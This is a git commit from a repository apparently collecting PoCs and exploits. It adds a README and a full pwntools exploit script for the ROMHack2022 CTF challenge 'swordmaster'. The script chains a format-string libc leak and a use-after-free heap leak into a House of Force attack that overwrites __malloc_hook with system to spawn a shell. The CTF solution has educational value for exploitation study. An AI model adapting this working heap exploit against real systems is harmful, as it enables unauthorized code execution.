STRLCPY/stigward_PoCs-and-Exploits

added swordmaster
stigward committed 2 years ago

a08963e8

1 parent 7d4958e7

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

CTFs/ROMHack2022/swordmaster/README.md

1	+	# PWN::Swordmaster
2	+
3	+	## Solution:
4	+	- Getting the flag for this challenge requires the exploitation of 3 bugs. First, we can leak the base address of libc with a format string vulnerability. Next, we can obtain the base address of the heap with a Use-After-Free (UAF) vulnerability. Finally, we can corrupt the top chunk of the heap’s metadata, allowing us to execute a “House Of Force” attack, overwriting __malloc_hook with system and obtaining a shell.
5	+	- [Full Write-up](https://stigward.github.io/posts/swordmaster-pwn-chal/) on my blog
6	+

■ ■ ■ ■ ■ ■

CTFs/ROMHack2022/swordmaster/exploit.py

1	+	from pwn import *
2	+	import sys
3	+	if not sys.warnoptions:
4	+	import warnings
5	+	warnings.simplefilter("ignore")
6	+
7	+	elf = ELF("./swordmaster")
8	+	libc = ELF("./glibc/libc.so.6")
9	+	p = elf.process(['./glibc/ld-linux-x86-64.so.2','./swordmaster'],env={"LD\_PRELOAD":"./glibc/libc.so.6"})
10	+
11	+	# ---- SET NAME ----
12	+	p.sendline('/bin/sh\0')
13	+
14	+	# ---- LEAK LIBC BASE WITH FORMAT STRING BUG ----
15	+	p.recvuntil(b'>> ')
16	+	p.sendline(b'%13$p')
17	+	p.recvuntil('There is no ')
18	+
19	+	libc_leak = p.recvline().split(b' ')[0]
20	+	libc_leak = int(libc_leak[2:], 16)
21	+	libc.address = libc_leak - 0x21c87
22	+
23	+	log.info("LEAKED LIBC BASE: " + hex(libc.address))
24	+
25	+
26	+	# ---- LEAK HEAP BASE WITH UAF BUG -------
27	+	p.recvuntil(b'>> ')
28	+	p.sendline(b'5')
29	+	p.recvuntil(b'>> ')
30	+	p.sendline(b'3')
31	+	p.recvuntil(b'Class: ')
32	+
33	+	heap = p.recvline()[:-1]
34	+	heap = int.from_bytes(heap, 'little') - 4800 - 0x10
35	+
36	+	log.info("LEAKED HEAP BASE: " + str(hex(heap)))
37	+
38	+	def malloc(size, data):
39	+	p.recvuntil(b'>> ')
40	+	p.sendline(b'1')
41	+	p.recvuntil(b'>> ')
42	+	p.sendline(str(size))
43	+	p.recvuntil(b'>> ')
44	+	p.sendline(data)
45	+
46	+
47	+
48	+	# ---- House Of Force Set-Up ----
49	+	malloc(40, b'\x41'*47)
50	+
51	+	# ---- Point top chunk to __malloc_hook ----
52	+	distance = libc.sym.__malloc_hook - (heap + 0x1330) - 0x10
53	+	malloc(distance, 'dummy')
54	+
55	+	# ---- Overwrite __malloc_hook with system ----
56	+	malloc(24, p64(libc.sym.system))
57	+
58	+	# ---- Point cmd at our name (/bin/sh) and call malloc to execute our overwritten hook ----
59	+	cmd = heap + 0x1270
60	+	p.recvuntil(b'>> ')
61	+	p.sendline(b'1')
62	+	p.recvuntil(b'>> ')
63	+	p.sendline(str(cmd))
64	+
65	+	p.interactive()
66	+

CTFs/ROMHack2022/swordmaster/pwn_swordmaster.zip

Binary file.

added swordmaster